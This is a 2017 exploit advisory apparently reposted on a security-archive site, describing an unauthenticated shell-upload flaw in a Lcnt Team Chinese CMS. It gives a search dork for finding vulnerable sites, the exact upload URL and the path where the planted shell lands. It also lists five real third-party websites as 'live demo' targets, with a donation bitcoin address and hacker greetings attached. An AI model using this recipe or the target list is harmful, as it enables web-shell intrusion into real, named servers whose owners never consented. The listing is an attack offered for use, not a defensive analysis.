Lcnt Team Shell Upload Vulnerability

2017.04.11
Credit: xBADGIRL21
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################## # [xBADGIRL21] # # [N3W PUBLIC 3XPL0IT] # # _,________ # # 0day _T _==____() -- # # /##(_)-' # # /##/ # # x21 # ############################## # Exploit Title : Lcnt Team Shell Upload Vulnerability # Exploit Author : xBADGIRL21 # Dork : CopyRight 2006-2017 温州龙诚互联科技有限公司 Lcnt Team # Vendor : http://icnt.net # Tested on: [WIN7] # MyBlog : http://xbadgirl21.blogspot.com # Date: 10-04-2017 # video Proof : https://youtu.be/s5hF8CQzKgM [*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz ###################### #|X|B|A|D|G|I|R|L|2|1| ###################### # [+] Poc : ###################### # [!] Exploit : http://127.0.0.1/admin/pic_add.php?Element=shopspic # [!] Shell Path : http://127.0.0.1/admin/lcnt/[RANDOM_NUM].php ###################### # [!] Live Demo : ###################### # http://trofom.com/admin/pic_add.php?Element=shopspic # http://www.chinaomay.com/admin/pic_add.php?Element=shopspic # http://bisco.net.cn/admin/pic_add.php?Element=shopspic # http://www.wzican.com/admin/pic_add.php?Element=shopspic # http://www.raxinte.com/admin/pic_add.php?Element=shopspic ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://youtu.be/s5hF8CQzKgM


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top